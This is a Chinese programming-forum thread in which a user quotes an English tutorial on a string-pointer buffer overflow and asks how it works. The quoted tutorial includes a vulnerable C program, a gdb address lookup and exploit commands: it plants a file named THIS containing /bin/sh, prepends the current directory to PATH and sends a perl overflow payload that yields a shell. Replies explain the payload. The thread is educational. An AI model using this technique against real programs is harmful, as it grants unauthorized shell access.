免费注册 查看新帖 |

ChinaUnix.net

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2357 | 回复: 3

[C] 缓冲区溢出的例子(字符串指针) [复制链接]

论坛徽章:
3
程序设计版块每日发帖之星
日期:2016-02-13 06:20:00程序设计版块每日发帖之星
日期:2016-06-22 06:20:00程序设计版块每日发帖之星
日期:2016-06-28 06:20:00
发表于 2016-06-24 09:22 |显示全部楼层
本帖最后由 keymirage 于 2016-06-24 09:30 编辑

下面是一个关于利用字符串指针实现缓冲区溢出的例子。根据文中的解释及代码,我的理解是:
1)input[256]是在 stack 内分配
2)conf, license 是在 heap 当中分配
3)新建一个名字为 THIS 的文件,内容是 /bin/sh
4)通过gdb找到 license 的首址 addr_license
5)将 conf “改为” 指向 addr_license
6)执行后获取 shell

问题:
上面的5)是如何实现的?代码(Figure 10: strptr.c)只是对input[256]使用了strcpy,且license的字符串只有20个字符,input[]应该没有溢出。也就是conf的压栈位置(input+256)处的内容是没有被更改的(即没有被 addr_license 覆盖)........

下面贴出例子全文:

Hardcoded strings are not pushed upon the stack, but saved within non-randomized areas. Therefore it is relatively easy to redirect a string pointer to another string. The idea of redirecting string pointers is not to manipulate the output, but rather to manipulate the arguments of critical functions like system or execv.
  1. Figure 10: strptr.c
  2. i n t    main ( i n t a r g c , char ∗ a r g s [ ] )
  3. {
  4.     char i n p u t [ 2 5 6 ] ;
  5.     char ∗ c o n f = ” t e s t −f  ̃ / . p r o g r c ” ;
  6.     char ∗ l i c e n s e = ” THIS SOFTWARE I S . . . ” ;
  7.     printf ( license );

  8.     strcpy ( input , args [ 1 ] ) ;
  9.     i f ( system ( conf ) )
  10.         p r i n t f ( ” Missing . progrc ” ) ;
  11. }
复制代码
Consider the vulnerable program strptr in figure 10. This program contains two hardcoded strings: conf and license. The license is just designed for output; conf is designed to be executed as shell command. Assume an attacker can conf let point to the license string. What would be executed in the if statement is:

system("THIS SOFTWARE IS...\n";

system tries to execute THIS and treats the remaining string as parameters for THIS. An executable file called THIS cannot be found on a normal Unix system, but can and should be created by an attacker.

An attacker can write an arbitrary binary or script called THIS that will be executed with the privileges of strptr. It could contain /bin/sh for instance. Note, that this exploitation technique cannot be used remotely, since an executable file has to be created locally and note that this executable file has to be accessible by the PATH environment. The string pointer conf can be overwritten since the program contains a strcpy vulnerability. One can use gdb to readout the address of the license string:

(gdb) print license
0x8048562 "THIS SOFTWARE IS...\n"

So the conf pointer should be redirected to 08048562hex . An exploit works as follows:

> echo "/bin/sh" > THIS
> chmod 777 THIS
> PATH=.PATH
> ./strptr ‘perl -e ’print "A"x256; print "\x62\x85\x04\x08"’‘
THIS SOFTWARE IS...
sh-3.1$

论坛徽章:
3
程序设计版块每日发帖之星
日期:2016-02-13 06:20:00程序设计版块每日发帖之星
日期:2016-06-22 06:20:00程序设计版块每日发帖之星
日期:2016-06-28 06:20:00
发表于 2016-06-24 09:33 |显示全部楼层
...............................................

论坛徽章:
0
发表于 2016-06-27 08:22 |显示全部楼层
perl -e ’print "A"x256; print "\x62\x85\x04\x08"

两个print哦, 第一个256个A覆盖input, 后面的4个字节(license的地址)覆盖conf, system(conf)就来执行THIS了,
这是理论上的, 但是实践通常很难成功哦, 除非关闭那些保护方法

奉劝楼主别研究这个了, 没前途, 时代变了, 老的c程序都很坚挺了, 再加上各种保护机制, 新程序大多都是更高级语言写的了.
看那些最近几年java的框架那些漏洞, 写个小脚本就能放倒一大群机器.

另外贴代码别用全角字符哦

论坛徽章:
3
程序设计版块每日发帖之星
日期:2016-02-13 06:20:00程序设计版块每日发帖之星
日期:2016-06-22 06:20:00程序设计版块每日发帖之星
日期:2016-06-28 06:20:00
发表于 2016-06-27 12:55 |显示全部楼层
tmp 发表于 2016-06-27 08:22
perl -e ’print "A"x256; print "\x62\x85\x04\x08"

两个print哦, 第一个256个A覆盖input, 后面的4个字 ...


谢谢提醒
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

基于案例的 SQL 优化实战训练营

讲师:中电福富特级专家梁敬彬,参与本次课程培训,你将收获:
1. 能编写出较为高效的 SQL;
2. 能解决70%以上的数据库常见优化问题;
3. 能得到老师提供的高效的相关工具和解决方案;
4. 能举一反三,收获不仅仅是 SQL 优化。
现在购票享受8.8折优惠!
----------------------------------------
优惠时间:2019年3月20日前

大会官网>>
  

北京盛拓优讯信息技术有限公司. 版权所有 16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122
中国互联网协会会员  联系我们:huangweiwei@it168.com
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP